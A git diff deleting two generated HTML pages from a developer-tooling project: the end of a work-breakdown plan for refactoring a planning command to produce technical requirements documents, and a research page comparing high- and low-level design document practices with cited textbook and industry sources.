-<li>Update top-level workspace pyproject if needed.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Each new adapter directory has a working <code>pyproject.toml</code> resolvable by <code>uv sync</code>.</li>
-<li>Each new adapter has a placeholder contract test runnable under <code>uv run pytest shield/adapters/&lt;tool&gt;/tests/</code>.</li>
-<li><code>shield/adapters/_common/design_refs.py</code> exports the named types and protocol.</li>
-<li><code>.mcp.json</code> entries for new adapters are present (even if disabled until EPIC-4-S3).</li>
-</ul>
-<h3 id="epic-4-s1--add-14-section-presence-rule--stale-anchor-rule-to-plan-review----priority-high">EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review  ·  <code>priority: high</code></h3>
-<p>Extend the <code>/plan-review</code> rubric to check that <code>trd.md</code> contains all 14 required sections with the canonical slug anchors. Sections containing <code>n/a — &lt;reason&gt;</code> pass; sections containing only 'TBD' or empty content fail. Report missing or vague sections as Critical severity.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>shield/skills/general/plan-review/SKILL.md</code> to add a 'TRD section presence' rule that imports the slug allow-list (14 entries) and checks each anchor exists in <code>trd.md</code>.</li>
-<li>Add a 'TRD section content' rule that, for each section, accepts either real content or a <code>n/a — &lt;reason&gt;</code> line; flags 'TBD'/empty.</li>
-<li>Add corresponding eval fixtures under <code>shield/evals/plan-review-trd/</code> exercising both rules (positive + missing-section + vague-TBD + n/a-without-reason).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>/plan-review</code> on a feature folder with a TRD missing any required section reports that section by slug as a Critical finding.</li>
-<li><code>/plan-review</code> on a feature folder with all 14 sections present (including any <code>n/a — &lt;reason&gt;</code> escapes) does not flag section presence or content.</li>
-<li><code>/plan-review</code> on a TRD with a section containing only 'TBD' flags it as a vague-content Critical finding.</li>
-<li><code>/plan-review</code> on a TRD with a section containing 'n/a' (no reason) flags it as a missing-reason finding.</li>
-</ul>
-<h3 id="epic-4-s2--add-prdtrd-duplication-detection-rule-to-plan-review----priority-medium">EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review  ·  <code>priority: medium</code></h3>
-<p>Detect when a TRD section verbatim-restates content from the linked PRD. Use a substring-overlap heuristic on §2 Problem Statement and §5 Functional Requirements.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Add a 'TRD restates PRD' rule to <code>/plan-review</code> that compares <code>trd.md</code> §2 + §5 against the linked <code>prd.md</code>.</li>
-<li>Define the substring-overlap threshold (e.g., flag if &gt; 80 characters of consecutive verbatim overlap).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A fixture pair where <code>trd.md</code> §2 copies <code>prd.md</code> problem section verbatim produces a duplication finding.</li>
-<li>A fixture pair where <code>trd.md</code> §2 paraphrases or summarizes the PRD problem section does not produce a finding.</li>
-</ul>
-<h3 id="epic-4-s3--pm-sync-emits-design_refs-as-web-links-with-idempotent-upsert----priority-high">EPIC-4-S3 · /pm-sync emits design_refs[] as web links with idempotent upsert  ·  <code>priority: high</code></h3>
-<p>Update <code>/pm-sync</code> adapters (ClickUp + Jira/Confluence/Notion from EPIC-4-S0) to forward each story's <code>design_refs[]</code> entries as web links on the synced task with a deterministic idempotency key. Adapter interface contract locked across all four; observability structured; tool/access requirements documented. Per Backend P0-1, P0-3, P0-4 + DX P1-3 + Backend P1-8 + DX P1-13.</p>
-<p><strong>Adapter file paths (P1-3)</strong></p>
-<ul>
-<li><code>shield/adapters/clickup/server/tools/sync.py</code> — extend existing</li>
-<li><code>shield/adapters/jira/server/tools/sync.py</code> — new (per EPIC-4-S0)</li>
-<li><code>shield/adapters/confluence/server/tools/sync.py</code> — new</li>
-<li><code>shield/adapters/notion/server/tools/sync.py</code> — new</li>
-</ul>
-<p><strong>Adapter interface contract (P0-3)</strong></p>
-<p>Each adapter exposes:</p>
-<pre><code class="language-python">def forward_design_refs(task_id: str, refs: list[DesignRef]) -&gt; ForwardResult: ...
-</code></pre>
-<p>where <code>ForwardResult = {created: int, skipped: int, errors: list[ForwardError]}</code>. Both <code>DesignRef</code> and <code>ForwardResult</code> are defined in <code>shield/adapters/_common/design_refs.py</code> (from EPIC-4-S0).</p>
-<p><strong>Idempotency key</strong>: each <code>DesignRef</code> produces <code>idempotency_key = sha256(story_id + anchor_url)[:32]</code>. Adapters use this as:</p>
-<ul>
-<li>Jira: <code>globalId</code> on <code>remote_issue_link</code></li>
-<li>Confluence: <code>name</code> on <code>remote_link</code></li>
-<li>ClickUp: comparison key for URL custom-field dedup before write</li>
-<li>Notion: comparison key for URL property dedup before write</li>
-</ul>
-<p><strong>Observability (P1-8)</strong>: one <code>action_log</code> entry per ref with <code>action='forward_design_ref'</code>, fields <code>{story_id, adapter, anchor_url, outcome, idempotency_key}</code>. Failures emit <code>action='forward_design_ref_failed'</code> with <code>{error_class, http_status, idempotency_key}</code>.</p>
-<p><strong>Tool &amp; access requirements (P1-13)</strong>:</p>
-<ul>
-<li>Integration tests use HTTP mocking via <code>responses</code> (preferred, credential-free CI) OR free-tier sandbox tenants when run live.</li>
-<li>Live credentials come from <code>SHIELD_&lt;ADAPTER&gt;_TOKEN</code> env vars; CI defaults to mocked mode.</li>
-<li>Python deps: Jira → <code>requests</code>; Confluence → <code>requests</code>; ClickUp → existing <code>httpx</code>; Notion → <code>requests</code>. All declared per-adapter.</li>
-</ul>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>shield/commands/pm-sync.md</code> to describe the forwarding contract, idempotency key, and per-adapter affordances.</li>
-<li>Implement <code>forward_design_refs</code> in each of the four adapter files above.</li>
-<li>Adapters with no link affordance log <code>'design_refs forwarding skipped — adapter does not support web links'</code> instead of failing.</li>
-<li>Adapter eval fixtures using <code>responses</code> / <code>respx</code> HTTP mocking.</li>
-<li><strong>(P0-4) Per-adapter idempotency test</strong> under <code>shield/adapters/&lt;tool&gt;/tests/test_idempotency.py</code>: run <code>forward_design_refs</code> twice with the same input against a mocked remote; assert second call produces 0 <code>created</code> and N <code>skipped</code>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Running <code>/pm-sync</code> against each of {Confluence, Jira, ClickUp, Notion} forwards <code>design_refs[]</code> URLs on the synced task.</li>
-<li>Running <code>/pm-sync</code> with empty <code>design_refs[]</code> succeeds with no side effect.</li>
-<li>Adapter fixtures pass in <code>shield/evals/</code>.</li>
-<li><strong>(P0-4)</strong> Running <code>/pm-sync</code> twice on the same plan produces no duplicates — verified by per-adapter idempotency test.</li>
-<li><strong>(P0-3)</strong> All four adapters implement the same <code>forward_design_refs(task_id, refs) → ForwardResult</code> signature from <code>_common/design_refs.py</code>.</li>
-<li><strong>(P1-8)</strong> <code>action_log</code> entries emitted per ref with the documented fields.</li>
-</ul>
-<hr />
-<h2 id="epic-5--drift--duplication-hardening----m3">EPIC-5 · Drift + duplication hardening  ·  M3</h2>
-<h3 id="epic-5-s1--add-last_aligned_with-metadata-to-planjson----priority-medium">EPIC-5-S1 · Add last_aligned_with metadata to plan.json  ·  <code>priority: medium</code></h3>
-<p>Add a top-level <code>last_aligned_with</code> field on <code>plan.json</code> that records the commit SHA of the most recent <code>/implement</code> run that closed a story. Countermeasure for undead-doc drift.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Bump <code>plan.json</code> schema to 1.3 to include <code>last_aligned_with: string | null</code>.</li>
-<li>Update <code>/implement</code> to write <code>last_aligned_with = HEAD-sha</code> after a story status flips to 'done'.</li>
-<li>Document semantics in <code>sidecar-schema.md</code>: <code>null</code> until first <code>/implement</code> run; updated on every subsequent story close.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Fresh <code>plan.json</code> has <code>last_aligned_with: null</code>.</li>
-<li>After <code>/implement</code> closes a story, <code>plan.json</code> has <code>last_aligned_with: &lt;40-char hex sha&gt;</code>.</li>
-<li><code>/pm-sync</code> surfaces the value in the synced epic description.</li>
-</ul>
-<h3 id="epic-5-s2--add-implementation-manual--pseudo-code-lint-rule-to-plan-review----priority-low">EPIC-5-S2 · Add implementation-manual / pseudo-code lint rule to /plan-review  ·  <code>priority: low</code></h3>
-<p>Detect TRD §7 (HLD) sections that contain code blocks of more than N lines without an Alternatives Considered rationale within the same section — the 'design doc is really an implementation manual' anti-pattern from <code>research.md</code>.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Add a 'implementation-manual detection' rule to <code>/plan-review</code>.</li>
-<li>Threshold: code block &gt; 20 lines triggers; rule passes if §8 Alternatives Considered is non-empty.</li>
-<li>Eval fixture: TRD with 30-line code block and empty §8 → flagged; TRD with 30-line code block and populated §8 → not flagged.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A TRD with a &gt;20-line code block and an empty §8 produces a finding.</li>
-<li>A TRD with a &gt;20-line code block and a populated §8 does not produce a finding.</li>
-<li>Threshold is documented in the rule's <code>SKILL.md</code>.</li>
-</ul>
-<hr />
-<h2 id="out-of-scope-locked">Out of scope (locked)</h2>
-<table>
-<thead>
-<tr>
-<th>Item</th>
-<th>Status</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><code>/lld &lt;component&gt;</code> command</td>
-<td>Template locked at 14 sections per <a href="https://github.com/infraspecdev/tesseract/pull/43">PR #43 sample</a>; authoring command is a separate epic.</td>
-</tr>
-<tr>
-<td>Adapter auto-creation of design-doc pages in Confluence/Notion</td>
-<td>v2 enhancement.</td>
-</tr>
-<tr>
-<td>Structured ClickUp/Notion relationships beyond URL fields</td>
-<td>v2 enhancement.</td>
-</tr>
-<tr>
-<td>Migration tool for existing <code>plan-architecture.md</code></td>
-<td>Direct cutover; files stay readable in old folders.</td>
-</tr>
-</tbody>
-</table>
-<h2 id="next-steps">Next steps</h2>
-<ul>
-<li><code>/plan-review docs/shield/plan-trd-refactor-20260524/plan.json</code> — multi-agent review.</li>
-<li><code>/pm-sync docs/shield/plan-trd-refactor-20260524/plan.json --tool &lt;clickup|jira|notion&gt;</code> — sync to PM tool.</li>
-<li><code>/implement</code> — start with EPIC-3-S1 (positive eval fixture) to anchor the RED → GREEN trail per CLAUDE.md.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/research.html b/docs/shield/plan-trd-refactor-20260524/outputs/research.html
deleted file mode 100644
index 7b673566..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/research.html
+++ /dev/null
@@ -1,837 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Research — plan-trd-refactor-20260524</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#decision">Decision</a>
-<ul>
-<li><a href="#canonical-lld-template-14-sections--from-sample-pr-43">Canonical LLD template (14 sections — from sample PR #43)</a></li>
-</ul>
-</li>
-<li><a href="#why-not-keep-plan-architecturemd">Why Not Keep plan-architecture.md?</a>
-</li>
-<li><a href="#what-the-industry-recommends">What the Industry Recommends</a>
-<ul>
-<li><a href="#ieee-1016-2009--software-design-descriptions">IEEE 1016-2009 — Software Design Descriptions</a></li>
-<li><a href="#ian-sommerville-software-engineering-10th-ed-ch-6">Ian Sommerville, Software Engineering (10th ed., Ch. 6)</a></li>
-<li><a href="#roger-pressman-software-engineering-a-practitioners-approach-8th-ed">Roger Pressman, Software Engineering: A Practitioner&#x27;s Approach (8th ed.)</a></li>
-<li><a href="#malte-ubl--design-docs-at-google">Malte Ubl — &quot;Design Docs at Google&quot;</a></li>
-<li><a href="#will-larson--lethaincom">Will Larson — lethain.com</a></li>
-<li><a href="#gergely-orosz--the-pragmatic-engineer">Gergely Orosz — The Pragmatic Engineer</a></li>
-<li><a href="#simon-brown--the-c4-model">Simon Brown — The C4 model</a></li>
-<li><a href="#reference-trds-actual-practice-notion-workspace-internal-evidence">Reference TRD&#x27;s actual practice (Notion workspace, internal evidence)</a></li>
-</ul>
-</li>
-<li><a href="#how-this-works-in-practice--plan-refactor-flow">How This Works in Practice — /plan Refactor Flow</a>
-<ul>
-<li><a href="#story-to-design-section-reference-contract">Story-to-design-section reference contract</a></li>
-<li><a href="#de-duplication-contract-addresses-the-users-named-risk">De-duplication contract (addresses the user&#x27;s named risk)</a></li>
-</ul>
-</li>
-<li><a href="#failure-modes--countermeasures">Failure Modes &amp; Countermeasures</a>
-</li>
-<li><a href="#decisions-locked--open-questions">Decisions Locked &amp; Open Questions</a>
-<ul>
-<li><a href="#decisions-locked-with-the-user-2026-05-24--2026-05-25">Decisions locked with the user (2026-05-24 → 2026-05-25)</a></li>
-<li><a href="#open-questions-for-the-implementation-phase">Open questions for the implementation phase</a></li>
-</ul>
-</li>
-<li><a href="#migration-path--reversibility">Migration Path / Reversibility</a>
-</li>
-<li><a href="#summary">Summary</a>
-</li>
-<li><a href="#product-lens">Product Lens</a>
-<ul>
-<li><a href="#scorecard-pm1pm11">Scorecard (PM1–PM11)</a></li>
-<li><a href="#user-impact-analysis">User Impact Analysis</a></li>
-<li><a href="#scope-recommendation">Scope Recommendation</a></li>
-<li><a href="#prioritization-framework">Prioritization Framework</a></li>
-<li><a href="#stakeholder-summary">Stakeholder Summary</a></li>
-<li><a href="#critical-gaps--user-verdict-2026-05-24">Critical gaps — user verdict (2026-05-24)</a></li>
-</ul>
-</li>
-<li><a href="#references">References</a>
-<ul>
-<li><a href="#internal-references-notion--reference-workspace">Internal references (Notion — reference workspace)</a></li>
-<li><a href="#internal-references-shield-repo">Internal references (Shield repo)</a></li>
-</ul>
-</li>
-<li><a href="#further-exploration">Further Exploration</a>
-<ul>
-<li><a href="#books">Books</a></li>
-<li><a href="#long-form-blogs--articles">Long-form blogs / articles</a></li>
-<li><a href="#videos--talks">Videos / talks</a></li>
-<li><a href="#courses">Courses</a></li>
-<li><a href="#podcasts--podcast-episodes">Podcasts / podcast episodes</a></li>
-<li><a href="#other">Other</a></li>
-</ul>
-</li>
-</ul>
-</nav>
-<h1 id="hldlld-best-practices--refactor-shield-plan-to-produce-a-trd">HLD/LLD Best Practices — Refactor /shield plan to Produce a TRD</h1>
-<p><strong>Status:</strong> Proposed
-<strong>Date:</strong> 2026-05-24
-<strong>Context:</strong> Shield's <code>/plan</code> produces a stories-first work-breakdown plus a <code>plan-architecture.md</code> companion. Industry convention is HLD → LLD; Shield is missing the high-level-design layer that justifies the work-breakdown. This research informs a refactor where <code>/plan</code> will emit a <strong>TRD = HLD + PM-lens milestones</strong>, with a separate <strong>LLD</strong> authored later per milestone, and <strong>stories that reference both HLD and LLD sections</strong>.</p>
-<h2 id="decision">Decision</h2>
-<p><code>/plan</code> should emit a <strong>TRD</strong> that combines (a) a high-level design grounded in IEEE 1016 / Sommerville / Pressman section coverage, (b) PM-lens milestones derived from the HLD, (c) a Rollback Strategy section preserving the strongest property of today's <code>plan-architecture.md</code>, and (d) a story breakdown where each story has an additive <code>design_refs</code> array pointing to TRD and LLD sections. The TRD <strong>replaces</strong> today's <code>plan-architecture.md</code> (direct cutover, no feature flag, no side-by-side period).</p>
-<p><strong>The TRD applies to both backend and infrastructure work</strong> — same 14-section template, same anchor IDs, same eval, same <code>/plan-review</code> rubric. A few sections (Product Journey, Functional Requirements, APIs Involved) have domain-aware interpretation in the <code>/plan</code> prompt; pure-state changes can declare <code>n/a — &lt;reason&gt;</code> per section as the explicit escape (a pattern borrowed from the LLD sample's §12). Two genuinely-infra-favored properties of today's ADR-flavored <code>plan-architecture.md</code> are preserved in the unified template:</p>
-<ul>
-<li><strong>§8 Alternatives Considered</strong> — where the &quot;5 numbered decisions with trade-offs&quot; pattern lives (VPC peering vs Transit Gateway, Aurora vs RDS, single vs multi-region).</li>
-<li><strong>§14 Rollback Strategy</strong> — promoted to a first-class 14th section (terraform destroy plans, state recovery, blue/green flip back, traffic shift reversal for infra; data rollback, feature-flag toggle, key rotation, schema reversal for backend).</li>
-</ul>
-<p><strong>LLDs are component-scoped, not milestone-scoped.</strong> Each LLD document covers one C4-style Container or Component (a service, library, or module). A single LLD can be referenced by multiple milestones — milestone M1 and milestone M2 may both touch <code>lld-component-auth.md</code>, each updating different sections. The TRD §10 (Milestones) lists <em>which</em> LLDs each milestone touches; the LLDs themselves grow incrementally as milestones land. <strong>LLDs are typically authored for backend components</strong> where pre-implementation design has measurable value; infra plans rarely need an LLD layer since the declarative terraform/k8s code is the spec.</p>
-<p>The recommended TRD template, reconciled across the reference TRD template and the industry consensus core, is:</p>
-<ol>
-<li><strong>Document Overview</strong> — title, status, authors, related PRD link, date</li>
-<li><strong>Problem Statement</strong> — what user/business/operational problem (links PRD; doesn't restate it)</li>
-<li><strong>Objective &amp; Scope</strong> — goals, non-goals (Google design-doc convention)</li>
-<li><strong>Product Journey</strong> — end-to-end user flow (backend) / request lifecycle through the infra or operator journey (infra). <code>n/a — &lt;reason&gt;</code> permitted for pure-state changes.</li>
-<li><strong>Functional Requirements</strong> — what users can do (backend) / what the infra must support — capacity, regions, accounts, traffic patterns (infra). Links PRD where possible.</li>
-<li><strong>Non-Functional Requirements</strong> — SLAs, perf, security, observability (backend) / SLOs, RPO/RTO, cost ceiling, blast radius, multi-AZ tolerance (infra). Uber RFC convention.</li>
-<li><strong>High-Level Design</strong> — services + data flow (backend) / network topology + resource graph + dependency chain (infra). Block/sequence/architecture diagrams.</li>
-<li><strong>Alternatives Considered</strong> — what we didn't pick and why. <strong>For infra plans, this is where the ADR-style &quot;5 numbered decisions with trade-offs&quot; pattern lives</strong> — VPC peering vs Transit Gateway, Aurora vs RDS, single vs multi-region. Google + Larson convention.</li>
-<li><strong>Cross-Cutting Concerns</strong> — security, privacy, observability, multi-tenancy (backend) / IAM, encryption, observability, cost, multi-region, disaster recovery, compliance-region constraints (infra). Google + Uber.</li>
-<li><strong>Milestones</strong> — PM-lens phased breakdown derived from the HLD (backend) / phased rollout — dev → stage → prod, canary regions, blue/green flip, percentage cutover (infra). Reference TRD precedent.</li>
-<li><strong>APIs Involved</strong> — HTTP contracts touched (backend) / module interfaces + cloud-API surface + IAM boundaries + output values consumed by downstream stacks (infra).</li>
-<li><strong>Open Questions</strong> — known unknowns; surfaced for follow-up</li>
-<li><strong>References</strong> — links to PRD, LLDs (forward links, populated as LLDs land), ADRs, runbooks</li>
-<li><strong>Rollback Strategy</strong> — data rollback, feature-flag toggle, key rotation, schema reversal (backend) / terraform destroy plan, state recovery, blue/green flip back, traffic shift reversal (infra). Promoted from today's <code>plan-architecture.md</code> Rollback section.</li>
-</ol>
-<p>Each milestone in §10 declares which LLDs it touches. The LLDs are authored separately (a future <code>/lld &lt;component&gt;</code> command) and follow the C4 model's Container/Component levels — one LLD per service, library, or module. Stories in <code>plan.json</code> get an optional <code>design_refs[]</code> field with <code>{doc, section_id, anchor_url, label}</code> — additive, backward-compatible with <code>/pm-sync</code>.</p>
-<p><strong><code>n/a — &lt;reason&gt;</code> escape per section.</strong> Following the LLD sample's §12 pattern, any of the 14 sections may declare <code>n/a — &lt;reason&gt;</code> when the section genuinely doesn't apply (e.g., §4 Product Journey on a pure-state infra change). Vague TBDs and silent omissions are not allowed — the eval rejects them — but an explicit &quot;n/a&quot; with rationale passes. This keeps the structure intact across domains without forcing pretend-content.</p>
-<h3 id="canonical-lld-template-14-sections--from-sample-pr-43">Canonical LLD template (14 sections — from sample PR #43)</h3>
-<p>The LLD template is anchored in <a href="https://github.com/infraspecdev/tesseract/pull/43">tesseract PR #43</a> — <code>docs/superpowers/specs/2026-05-18-lld-sample.html</code> — a Bytebite user-signup sample that establishes the LLD shape Shield should generate:</p>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Section</th>
-<th>Always-on?</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>Overview</td>
-<td>Yes</td>
-<td>Names which epics/PRD milestones this LLD serves — bidirectional with TRD §10</td>
-</tr>
-<tr>
-<td>2</td>
-<td>Scope &amp; non-goals</td>
-<td>Yes</td>
-<td>In-scope/out-of-scope lists</td>
-</tr>
-<tr>
-<td>3</td>
-<td>Module layout</td>
-<td>Yes</td>
-<td>File tree with <code>new</code>/<code>mod</code>/<code>unchanged</code> badges</td>
-</tr>
-<tr>
-<td>4</td>
-<td>Data model</td>
-<td>Yes</td>
-<td>Tables + Redis/cache namespaces with column-level detail</td>
-</tr>
-<tr>
-<td>5</td>
-<td>API contracts</td>
-<td>Yes</td>
-<td>Per-endpoint request/response (each endpoint gets its own sub-anchor, e.g., <code>#api-create-user</code>)</td>
-</tr>
-<tr>
-<td>6</td>
-<td>Sequence flows</td>
-<td>Yes</td>
-<td>Mermaid sequence diagrams (each flow gets its own sub-anchor, e.g., <code>#flow-signup</code>)</td>
-</tr>
-<tr>
-<td>7</td>
-<td>Error handling</td>
-<td>Yes</td>
-<td>Error codes + behavior matrix</td>
-</tr>
-<tr>
-<td>8</td>
-<td>Concurrency &amp; state</td>
-<td>Yes</td>
-<td>Named race conditions and resolutions</td>
-</tr>
-<tr>
-<td>9</td>
-<td><strong>Configuration</strong></td>
-<td><strong>Promote-on-demand</strong></td>
-<td>Config values; lifted when the component needs them</td>
-</tr>
-<tr>
-<td>10</td>
-<td>Observability</td>
-<td>Yes</td>
-<td>Logs, metrics, traces</td>
-</tr>
-<tr>
-<td>11</td>
-<td><strong>Security &amp; privacy</strong></td>
-<td><strong>Promote-on-demand</strong></td>
-<td>Auth, PII, threats; lifted when the component touches user data</td>
-</tr>
-<tr>
-<td>12</td>
-<td>Performance &amp; scaling</td>
-<td>Yes — <strong>8 forced subsections</strong></td>
-<td>12.1 Load · 12.2 SLO · 12.3 Bottleneck · 12.4 Latency breakdown · 12.5 Capacity · 12.6 Scale-out lever · 12.7 Caches · 12.8 Degradation. <em>&quot;n/a — <reason>&quot;</em> is the only escape; vague prose is not allowed.</td>
-</tr>
-<tr>
-<td>13</td>
-<td>Open questions</td>
-<td>Yes</td>
-<td>Q#, question, options, owner, resolve-by table</td>
-</tr>
-<tr>
-<td>14</td>
-<td>Changelog</td>
-<td>Yes</td>
-<td>Every edit ties to a story ID + sections touched — closes the loop with <code>plan.json</code> <code>design_refs[]</code></td>
-</tr>
-</tbody>
-</table>
-<p><strong>Header metadata</strong> (above §1): Feature · Owner · Status · Linked PRD · Linked plans (plural — one LLD, many plans) · Version · Last updated.</p>
-<p><strong>Why this shape works for Shield:</strong></p>
-<ul>
-<li><strong>Per-component scope</strong> with <code>Linked plans</code> plural matches the user's &quot;same LLD doc covered across multiple milestones&quot; intent.</li>
-<li><strong>Stable kebab-case anchors</strong> on every section AND subsection — directly addresses Confluence-style anchor-rot the research surfaced.</li>
-<li><strong>§12's 8 forced subsections</strong> are the strongest anti-format-drift mechanism in the template: a fixture-based eval can mechanically check that all 8 are present and non-empty, with <code>&quot;n/a — &lt;reason&gt;&quot;</code> as the only allowed escape.</li>
-<li><strong>§14 Changelog with story IDs</strong> is the inverse of <code>design_refs[]</code> on the story side — the LLD knows which stories touched it; the story knows which LLD sections it depends on. Bidirectional graph.</li>
-<li><strong>§9 + §11 promote-on-demand</strong> acknowledges that not every component touches config or user data — keeps the template scoped to reality without losing the slot.</li>
-</ul>
-<h2 id="why-not-keep-plan-architecturemd">Why Not Keep <code>plan-architecture.md</code>?</h2>
-<table>
-<thead>
-<tr>
-<th></th>
-<th>Today's <code>plan-architecture.md</code></th>
-<th>Proposed unified TRD</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Domain coverage</td>
-<td>De-facto infra/ADR-flavored</td>
-<td><strong>Both infra and backend</strong> — same template, domain-aware prompting per section</td>
-</tr>
-<tr>
-<td>Origin</td>
-<td>Shield convention; closer to ADR + HLD hybrid</td>
-<td>IEEE 1016 + reference TRD template + Google design-doc lineage</td>
-</tr>
-<tr>
-<td>HLD coverage</td>
-<td>Solution sketch + 5 numbered decisions + PR sequencing</td>
-<td>Full HLD viewpoint coverage: context, composition, interfaces, NFRs</td>
-</tr>
-<tr>
-<td>NFRs</td>
-<td>Implicit</td>
-<td>Explicit §6 (forced for both domains — SLOs/RPO/RTO/cost matter for infra too)</td>
-</tr>
-<tr>
-<td>Alternatives</td>
-<td>Present (good)</td>
-<td>Preserved in §8 — the ADR-style &quot;decisions with trade-offs&quot; pattern lives here</td>
-</tr>
-<tr>
-<td>Rollback strategy</td>
-<td>Present in plan-architecture.md</td>
-<td><strong>Promoted to first-class §14</strong> (universal)</td>
-</tr>
-<tr>
-<td>Milestones</td>
-<td>&quot;Deliverables&quot; as PR sequencing</td>
-<td>First-class §10 — feature phases (backend) or phased rollout (infra)</td>
-</tr>
-<tr>
-<td>Cross-cutting</td>
-<td>Implicit</td>
-<td>Explicit §9 — forces IAM/cost/observability/DR for infra</td>
-</tr>
-<tr>
-<td>Story traceability</td>
-<td>None (LLD-shaped content buried in <code>plan.json</code> descriptions)</td>
-<td>Each story gets <code>design_refs[]</code> pointing to TRD/LLD sections</td>
-</tr>
-<tr>
-<td>Reviewer rubric</td>
-<td>Free-form</td>
-<td>Structured — <code>/plan-review</code> grades 14 fixed sections (with <code>n/a — &lt;reason&gt;</code> escape)</td>
-</tr>
-</tbody>
-</table>
-<p>The unified TRD subsumes everything <code>plan-architecture.md</code> does well (decisions, alternatives, rollback) and adds the structural rigor that infra plans currently lack (forced NFRs, Cross-Cutting, first-class Milestones).</p>
-<h2 id="what-the-industry-recommends">What the Industry Recommends</h2>
-<h3 id="ieee-1016-2009--software-design-descriptions">IEEE 1016-2009 — Software Design Descriptions</h3>
-<blockquote>
-<p><em>&quot;A representation of a software design to be used for communicating design information to its stakeholders.&quot;</em></p>
-<p><em>&quot;Design view: A representation comprised of one or more design elements to address a set of design concerns from a specified design viewpoint.&quot;</em>
-— <a href="https://cengproject.cankaya.edu.tr/wp-content/uploads/sites/10/2017/12/SDD-ieee-1016-2009.pdf">IEEE Std 1016-2009, Clause 3 — full PDF via Çankaya University</a></p>
-</blockquote>
-<p>IEEE 1016 names 12 design viewpoints (Context, Composition, Logical, Dependency, Information, Patterns-use, Interface, Structure, Interaction, State dynamics, Algorithm, Resource). A defensible HLD-vs-LLD split treats the first ~7 (Context → Interface) as HLD and the last ~5 (Structure → Resource) as LLD. The proposed TRD §7 (HLD) covers Context + Composition + Logical + Interface viewpoints; §11 (APIs Involved) covers Interface explicitly. LLD covers Structure + State + Algorithm + Resource.</p>
-<h3 id="ian-sommerville-software-engineering-10th-ed-ch-6">Ian Sommerville, <em>Software Engineering</em> (10th ed., Ch. 6)</h3>
-<blockquote>
-<p><em>&quot;Architectural design is concerned with understanding how a software system should be organized and designing the overall structure of that system.&quot;</em></p>
-<p><em>&quot;Architectural design is the critical link between design and requirements engineering as it identifies the main structural components in a system and the relationships between them.&quot;</em></p>
-<p><em>&quot;Architecture may be used as a focus of discussion by system stakeholders. … Analysis of whether the system can meet its non-functional requirements is possible. … The architecture may be reusable across a range of systems.&quot;</em>
-— Sommerville, Chapter 6 §6.1</p>
-</blockquote>
-<p>Sommerville's three justifications for explicit architecture — stakeholder communication, NFR analysis, reuse — map directly to TRD §4 (Product Journey, stakeholder communication), §6 (NFRs explicit), §7 (HLD as reusable architectural template).</p>
-<h3 id="roger-pressman-software-engineering-a-practitioners-approach-8th-ed">Roger Pressman, <em>Software Engineering: A Practitioner's Approach</em> (8th ed.)</h3>
-<p>Pressman organizes design into four layers:</p>
-<blockquote>
-<p><em>&quot;Architectural design defines the relationship between major structural elements of the software, the architectural styles and design patterns that can be used to achieve the requirements defined for the system.&quot;</em></p>
-<p><em>&quot;Component-level design transforms structural elements of the software architecture into procedural description of software components.&quot;</em></p>
-</blockquote>
-<p>Pressman's split — architectural + data + interface (HLD) vs. component-level (LLD) — is the cleanest textbook mapping for the TRD/LLD layering.</p>
-<h3 id="malte-ubl--design-docs-at-google">Malte Ubl — &quot;Design Docs at Google&quot;</h3>
-<blockquote>
-<p><em>&quot;The design doc is the place to write down the trade-offs you made in designing your software.&quot;</em></p>
-<p><em>&quot;A short list of bullet points of what the goals of the system are, and, sometimes more importantly, what non-goals are.&quot;</em></p>
-<p><em>&quot;This is where your organization can ensure that certain cross-cutting concerns such as security, privacy, and observability are always taken into consideration.&quot;</em></p>
-<p><em>&quot;A clear indicator that a doc might not be necessary are design docs that are really implementation manuals. If a doc basically says 'This is how we are going to implement it' without going into trade-offs, alternatives, and explaining decision making … then it would probably have been a better idea to write the actual program right away.&quot;</em>
-— <a href="https://www.industrialempathy.com/posts/design-docs-at-google/">Design Docs at Google, industrialempathy.com</a></p>
-</blockquote>
